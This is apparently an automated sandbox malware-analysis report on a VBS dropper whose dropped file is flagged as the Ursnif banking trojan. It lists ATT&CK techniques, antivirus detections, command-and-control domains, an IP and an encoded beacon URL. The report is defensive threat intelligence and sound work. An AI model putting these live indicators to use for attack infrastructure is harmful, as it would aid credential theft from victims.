Source: Yara match	File source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection812	Scripting121	Credential API Hooking3	File and Directory Discovery3	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	System Information Discovery26	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	Security Software Discovery331	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell1	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Virtualization/Sandbox Evasion4	SSH	Keylogging	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion4	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Network Configuration Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0xyZ4rY0opA2.vbs	22%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\earmark.avchd	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Temp\earmark.avchd	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\earmark.avchd	32%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\earmark.avchd	90%	ReversingLabs	Win32.Trojan.Ursnif

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
c56.lepini.at	12%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	12%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://api3.lepini.at/api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v	0%	Avira URL Cloud	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myip.opendns.com	84.17.52.25	true	false		high
c56.lepini.at	47.241.19.44	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	47.241.19.44	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	47.241.19.44	true	false	12%, Virustotal, Browse	unknown
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000018.00000002.926126421.000001B497681000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.19.44	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	322273
Start date:	24.11.2020
Start time:	20:33:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0xyZ4rY0opA2.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@32/52@10/2
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
